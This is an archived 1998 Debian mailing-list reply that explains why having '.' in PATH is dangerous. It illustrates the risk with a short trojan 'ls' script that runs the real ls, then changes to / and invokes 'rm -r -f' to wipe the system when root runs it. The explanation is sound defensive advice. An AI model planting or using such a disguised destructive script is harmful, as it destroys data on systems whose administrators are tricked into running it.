Re: Why having the . at the end of someone's PATH is a security ?

To: shaul <shaulk@netvision.net.il>
Cc: Paul Crowley <paul@hedonism.demon.co.uk>, rathon <rathon01@usa.net>, debian-user@lists.debian.org
Subject: Re: Why having the . at the end of someone's PATH is a security ?
From: "M.C. Vernon" <mcv21@cus.cam.ac.uk>
Date: Wed, 14 Oct 1998 22:52:23 +0100 (BST)
Message-id: <[🔎] Pine.SOL.3.96.981014225033.18093A-100000@taurus.cus.cam.ac.uk>
Reply-to: matthew@sel.cam.ac.uk
In-reply-to: <[🔎] m0zTXXU-0002AbC@rakefet>

> > There shouldn't be a "." in your PATH; even at the end, it's a
> > security risk. 
> 
> Why ? How it can be exploited ?

Simple - I put a program called ls in my home directory of a machine I
want to wreck.

#!/bin/bash
/usr/bin/ls
cd /
rm -r -f

and make it executable. Root cds to my directory to check up on something,
and does an ls. Voila - one hosed system, and chances are he won't notice
until at least some damage is done.

Matthew


-- 
Elen sila lumenn' omentielvo

Steward of the Cambridge Tolkien Society
Selwyn College Computer Support
http://www.geocities.com/Area51/Chamber/8841/
http://www.cam.ac.uk/CambUniv/Societies/tolkien/
http://pick.sel.cam.ac.uk/

Reply to:

References:
- Why having the . at the end of someone's PATH is a security ?
  - From: shaulk@netvision.net.il (shaul)

Prev by Date: Re: [Debian] support for Adaptec 2940UW2 ?
Next by Date: Re: Slow ifconfig
Previous by thread: Re: Why having the . at the end of someone's PATH is a security ?
Next by thread: Re: Why having the . at the end of someone's PATH is a security ?
Index(es):
- Date
- Thread